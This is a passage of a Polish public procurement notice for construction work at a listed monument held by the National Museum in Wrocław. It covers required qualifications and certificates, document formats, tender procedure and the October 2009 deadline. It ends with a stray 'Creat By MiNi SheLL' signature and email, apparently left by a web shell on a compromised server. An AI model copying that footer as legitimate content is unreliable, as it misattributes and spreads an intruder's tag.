5)	Dokumentów potwierdzających posiadanie, przez wskazane osoby, które będą uczestniczyć w wykonaniu zamówienia, właściwych uprawnień wykonawczych do sprawowania samodzielnych funkcji w budownictwie oraz dokumentów potwierdzających przynależność do Okręgowej Izby Inżynierów Budownictwa, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. nr 156 poz. 1118 z późn. zm.) i ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.) - zaświadczenie wydane przez tę izbę, z określonym w nim terminem ważności; dołączyć, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym, do załącznika nr 4 Formularza Ofertowego.

6)	Dokumentu potwierdzającego, że osoba, która pełnić będzie funkcję kierownika budowy, zgodnie z § 8 ust. 1 Rozporządzenia Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004r. Nr 150, poz. 1579) odbyła, co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (dokument wystawiony przez ówczesnego pracodawcę lub równoważne zaświadczenie wojewódzkiego konserwatora zabytków o kwalifikacjach do nadzorowania i kierowania robotami budowlanymi przy zabytkach nieruchomych); dołączyć, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę uprawnioną do reprezentacji Wykonawcy w obrocie gospodarczym, do załącznika nr 4 Formularza Ofertowego.

II. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, stosuje się do przepisów §2 Rozporządzenia Prezesa rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z nr 87 z 2006 r. poz. 605 z późniejszymi zmianami). 


III. Forma dokumentów: wszystkie dokumenty (z wyjątkiem pełnomocnictwa, które Wykonawca składa w oryginale lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza) muszą być przedstawione w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę (poświadczenie za zgodność z oryginałem musi być dokonane przez osoby upoważnione do reprezentowania wykonawcy). Wykonawca składa wszystkie dokumenty sporządzone w języku obcym wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.mnwr.art.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe we Wrocławiu. pl. Powstańców Warszawy 5. 50,153 Wrocław. Dział administracyjno-gospodarczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2009 godzina 10:00, miejsce: Muzeum Narodowe we Wrocławiu, pl. Powstańców Warszawy 5, 50,153 Wrocław, Dział administracyjno-gospodarczy, pok.3-4.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com